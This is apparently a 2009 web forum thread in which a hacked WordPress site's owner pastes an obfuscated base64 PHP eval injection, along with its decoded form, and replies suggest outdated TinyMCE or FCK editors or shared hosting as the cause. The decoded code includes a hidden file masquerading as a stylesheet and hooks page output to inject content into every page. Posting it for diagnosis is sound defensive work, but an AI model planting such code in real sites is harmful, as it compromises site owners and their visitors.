Forum Moderators: rogerd
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hf
bm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb250ZW50L
24vdS90L251dHJpYmxlbmR6L2h0bWwvYnV5YnVsa3doZXkvd29yZHByZXNzL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbW
zL2FkdmFuY2VkL3NraW5zL2RlZmF1bHQvaW1nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9jb250ZW50L
24vdS90L251dHJpYmxlbmR6L2h0bWwvYnV5YnVsa3doZXkvd29yZHByZXNzL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWV
zL2FkdmFuY2VkL3NraW5zL2RlZmF1bHQvaW1nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb2
5fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZCl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDskZT0wO2lmKCRmJjQpeyRlPXVucGFjaygndicsc3Vic3RyKCRkL
DEwLDIpKTskZT0kZVsxXTskaCs9MiskZTt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMTYpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRo
Kz0yO30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWYoJHU9PT1GQUxTRSl7JHU9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc
6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKS
wkYyk7fWVsc2V7cmV0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
[edited by: rogerd at 3:39 pm (utc) on May 7, 2009]
[edit reason] side scroll [/edit]
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/content/n/u/t/nutriblendz/html/buybulkwhey/wordpress/wp-includes/js/tinymce/themes/advanced/skins/default/img/style.css.php')){include_once('/home/content/n/u/t/nutriblendz/html/buybulkwhey/wordpress/wp-includes/js/tinymce/themes/advanced/skins/default/img/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
Your site was most likely hacked because you have an outdated editor such as TinyMCE or FCK Editor.
If it's shared hosting, it's entirely possible your site may be hacked due to a vulnerability on another site hosted on that server, but the first two options are most likely.
